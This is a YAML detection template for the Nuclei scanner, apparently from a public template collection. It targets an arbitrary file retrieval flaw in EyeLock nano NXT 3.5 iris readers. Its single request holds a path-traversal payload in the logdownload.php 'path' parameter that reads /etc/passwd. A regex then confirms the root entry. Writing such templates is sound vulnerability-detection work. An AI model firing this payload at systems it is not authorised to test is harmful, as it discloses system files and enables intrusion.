id: eyelock-nano-lfd

info:
  name: EyeLock nano NXT 3.5 - Arbitrary File Retrieval
  author: geeknik
  severity: high
  description: EyeLock nano NXT suffers from a file retrieval vulnerability when input passed through the 'path' parameter to 'logdownload.php' script is not properly verified before being used to read files. This
    can be exploited to disclose contents of files from local resources.
  reference:
    - https://www.zeroscience.mk/codes/eyelock_lfd.txt
  tags: iot,lfi,eyelock

requests:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: regex
        regex:
          - "root:[x*]:0:0:"
        part: body

# Enhanced by mp on 2022/04/08